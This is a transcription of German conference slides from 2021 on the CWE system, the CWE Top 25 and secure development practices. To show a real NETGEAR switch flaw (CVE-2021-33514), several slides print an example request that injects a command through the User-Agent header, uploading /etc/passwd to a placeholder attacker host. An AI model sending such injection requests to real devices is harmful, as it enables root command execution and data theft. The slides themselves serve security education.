Common Weakness Enumeration - CWE - und die Top 25 Most Dangerous Software Weaknesses - Karlsruher ...
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
Common Weakness Enumeration – CWE …und die Top 25 Most Dangerous Software Weaknesses Karlsruher Entwicklertag 2021 Zoom-Konferenz, 09.06.2021 Christian Titze Security Consulting & Penetration Testing christian.titze@secorvo.de
Das System soll sicher sein.
Die magische Pentest-Blackbox
Hacker
?
Mate, Voodoo &
Schwarze Magie
REQUIRE- IMPLEMEN- VERIFI- MAINTE-
DESIGN RELEASE
MENTS TATION CATION NANCE
Penetration
Test
Vergessenes Flaws Bugs
Icons made by Freepik, Smashicons from www.flaticon.com
REQUIRE- IMPLEMEN- VERIFI- MAINTE-
DESIGN RELEASE
MENTS TATION CATION NANCE
Penetration
Delays
Test
Vergessenes Flaws Bugs
Icons made by Freepik, Smashicons from www.flaticon.comRelative Cost to Fix
(based on time of detection)
30 x
25 x
20 x
15 x
10 x
5x
0x
Requirements / Coding Integration / System / Acceptance Production /
Architecture Component Testing Testing Post-Release
Quelle: National Institute of Standards and Technology (NIST)Relative Cost of Fixing Defects
100 x
90 x
80 x
70 x
60 x
50 x
40 x
30 x
20 x
10 x
0x
Design Implementation Testing Maintenance
Quelle: IBM System Science InstituteJe später ein Problem behoben wird, desto teurer.
“ If you fail a penetration test you know you
have a very bad problem indeed.
If you pass a penetration test you do not
know that you don’t have a very bad problem.
― Gary McGraw*
* According to OWASP Testing Guide v3Security Requirements
Security Risk Assessment
Privacy Risk Assessment
MENTS
REQUIRE-
Attack Surface Analysis
Threat Modeling
Abuse Cases & Attack Trees
DESIGN
Security Design Reviews
Code & Configuration Reviews
Secure by Default Configuration
Static Analysis
Approved Tools, Functions, Libraries
TATION
Trustworthy Dependencies
IMPLEMEN-
Dynamic Analysis
Fuzzing
Attack Surface Review
Penetration Testing
VERIFI-
CATION
Infrastructure Configuration Review
Incident Response Plan
RELEASE
Periodic Configuration Reviews
Periodic Penetration Tests
Dedicated Security Update Channel
NANCE
MAINTE-
Icons made by Freepik, Smashicons from www.flaticon.comREQUIRE- IMPLEMEN- VERIFI- MAINTE-
TRAINING DESIGN RELEASE
MENTS TATION CATION NANCE
Icons made by Freepik, Smashicons from www.flaticon.comIcons made by Freepik, Smashicons from www.flaticon.com
CWE
serious 1337 skillz
Weaknesses
Exploit
Attack Patterns
CAPEC
Vulnerabilities
CVE
Icons made by Freepik, Smashicons from www.flaticon.com“ Weaknesses are things, that can be a problem
in the right conditions. Those right conditions
are what makes them vulnerabilities.
― Robert Martin, CWE/CAPEC Program ManagerCVE Konkrete, produkt- und versionsspezifische,
öffentlich bekannte Schwachstellen.
CWE
Formale Sammlung von Schwächen in Software
und Hardware, die die Ursachen für Schwachstellen
darstellen können.
CAPEC
Formale Sammlung von implementierungsunabhängigen
Angriffstechniken, inkl. typischen Schritten zur
Durchführung des Angriffs.CVE-2021-33514
Unauthenticated Command Injection
in Certain NETGEAR Smart Switches
8.8 / 10.0
Image: NETGEARGET /sqfs/home/web/cgi/setup.cgi?token=';$HTTP_USER_AGENT;'
User-Agent: curl --upload-file /etc/passwd http://evil.sink/
CAPEC-88
Unauthenticated
Attacker on LAN Command
execution as root
Icons made by Freepik, Smashicons from www.flaticon.comGET /sqfs/home/web/cgi/setup.cgi?token=';$HTTP_USER_AGENT;'
User-Agent: curl --upload-file /etc/passwd http://evil.sink/
CAPEC-88
CVE-2021-33514
Unauthenticated
Attacker on LAN Command
execution as root
Icons made by Freepik, Smashicons from www.flaticon.comGET /sqfs/home/web/cgi/setup.cgi?token=';$HTTP_USER_AGENT;'
User-Agent: curl --upload-file /etc/passwd http://evil.sink/
CAPEC-88
CVE-2021-33514 CWE-78
Unauthenticated
Attacker on LAN Command
execution as root
Icons made by Freepik, Smashicons from www.flaticon.comVIEW CATEGORY PILLAR
CLASS
C CWE-119: Improper Restriction of Operations
within the Bounds of a Memory Buffer
B B BASE
CWE-787: Out-of-Bounds Write
V V V V VARIANT
CWE-121: Stack-based Buffer OverflowCWE Top 25 Most Dangerous Software Weaknesses (...and Weaknesses on the Cusp)
REQUIRE- IMPLEMEN- VERIFI- MAINTE-
TRAINING DESIGN RELEASE
MENTS TATION CATION NANCE
Icons made by Freepik, Smashicons from www.flaticon.comLeider nicht für Software Weaknesses…
You can also read
